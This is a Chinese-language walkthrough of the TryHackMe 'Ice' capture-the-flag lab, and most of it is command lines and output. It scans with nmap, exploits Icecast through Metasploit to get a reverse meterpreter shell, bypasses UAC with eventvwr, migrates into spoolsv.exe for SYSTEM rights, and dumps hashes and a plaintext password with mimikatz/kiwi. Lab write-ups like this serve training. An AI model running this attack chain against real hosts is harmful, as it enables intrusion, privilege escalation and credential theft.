免责声明
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。
服务扫描
┌──(root💀kali)-[~/tryhackme/ice]
└─# nmap -sV -Pn 10.10.121.62
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-15 00:43 EST
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 00:44 (0:00:19 remaining)
Nmap scan report for 10.10.121.62
Host is up (0.30s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp open http Icecast streaming media server
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
看到开了很多端口,我们留意8000端口这个服务,在CVE Details显示存在一个Execute CodeOverflow漏洞,CVE编号为:CVE-2004-1561
在msf上搜索这个编号的漏洞利用模块:
msf6 > search CVE-2004-1561
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header
初始shell
设置参数,开始攻击,顺利拿到初始shell
msf6 exploit(windows/http/icecast_header) > set rhosts 10.10.121.62
rhosts => 10.10.121.62
msf6 exploit(windows/http/icecast_header) > set lhost tun0
lhost => tun0
msf6 exploit(windows/http/icecast_header) > run
[*] Started reverse TCP handler on 10.13.21.169:4444
[*] Sending stage (175174 bytes) to 10.10.121.62
[*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.121.62:49302) at 2021-11-15 02:40:26 -0500
meterpreter > shell
Process 356 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>whoami
whoami
dark-pc\dark
使用post/multi/recon/local_exploit_suggester枚举提权模块
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.121.62 - Collecting local exploits for x86/windows...
[*] 10.10.121.62 - 37 exploit checks are being tried...
[+] 10.10.121.62 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.121.62 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
我们选择exploit/windows/local/bypassuac_eventvwr这个提权模块,设置参数,进行提权
msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > options
Module options (exploit/windows/local/bypassuac_eventvwr):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.3.67 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 10.13.21.169:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.10.121.62
[*] Meterpreter session 2 opened (10.13.21.169:4444 -> 10.10.121.62:49336) at 2021-11-15 03:12:02 -0500
[*] Cleaning up registry keys ...
meterpreter > shell
Process 356 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>whoami
whoami
dark-pc\dark
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
提权
我们的权限账号依然是dark-pc\dark,但是用getprivs命令查看,显示现在已经拥有了SeTakeOwnershipPrivilege的权限
用PS命令列出目前靶机所有进程:
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
500 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
588 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
816 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
884 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
932 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1056 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1136 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1224 816 slui.exe x64 1 Dark-PC\Dark C:\Windows\System32\slui.exe
1264 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1328 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1408 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
1516 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1528 500 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1548 1508 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1712 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1720 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
1752 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1804 816 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
1892 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
2108 2300 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe
2124 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2284 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
2300 1548 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2352 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
2460 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
2528 692 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2536 2092 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
2916 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
留意这个进程:
1264 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
这个进程与当前进程同样是x64架构。我们用migrate -N把进程迁移到这个进程当中,成功升级到系统最高权限。
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2536 to 1264...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
获取其他用户凭证
使用load kiwi命令收集系统里其他用户的凭证信息
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
使用命令help查看支持的kiwi指令:
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
使用creds_all命令打印出所有用户凭证:
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
我们看到dark的登录密码是:Password01!
